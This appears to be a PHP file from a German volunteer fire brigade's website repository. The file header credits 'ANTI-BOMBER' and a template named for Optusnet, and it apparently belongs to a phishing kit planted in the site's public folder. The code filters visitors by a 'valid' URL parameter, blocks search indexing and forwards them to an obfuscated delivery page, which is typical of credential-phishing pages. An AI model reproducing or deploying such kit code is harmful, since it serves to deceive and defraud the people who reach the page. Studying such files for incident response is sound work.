Feuerwehr-eppingen/public/.app/DELIVERY/F004f19441/index.php
ppa. Marco Glietsch f9f160121e Anpassung
- Anmeldeformular für Kinderfeuerwehr fertiggestellt
- Fehlerbehebung wegen Umstellung auf https
- Navigationsleiste wird in der Kategorie "Wir über uns" dynamisch erstellt
2022-08-19 12:56:02 +02:00

35 lines
1.3 KiB
PHP
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

<?php
/*==========================================================================
* +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ Author Name : ANƬƖ-ƁƠMƁЄƦ
* [A][и][T][Ɩ] [в][σ][м][в][є][я] Template Name : O|P|T|U|S|N|E|T|-|C|O|M|-|A|U|
* +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ Template Version : V.1.1 By 🄰🄽🅃🄸-🄱🄾🄼🄱🄴🅁
===========================================================================*/
$page = 'index';
/* Require Files */
require_once './init.php';
/* Chak If User Coming From Valid URL */
if($_SERVER['REQUEST_METHOD'] == 'GET' && isset($_GET['valid']) && $_GET['valid'] === 'true'):
?>
<!doctype html>
<html class="no-js" lang="">
<head>
<meta charset="utf-8">
<meta http-equiv="x-ua-compatible" content="ie=edge">
<title>Willkommen,</title>
<meta name="robots" content="noindex, nofollow, noimageindex">
<meta name="description" content="">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="<?php echo $css1; ?>">
<link rel="shortcut icon nofollow" href="<?php echo $favicon; ?>">
<script src="<?php echo $js;?>"></script>
</head>
<body>
<?php die(rediret('./11644210b.php?web=succes&local=_&'.$id)); // We're done here ?>
</body>
</html>
<?php
else:
die(rediret($index)); // We're done here
endif;
ob_end_flush();
?>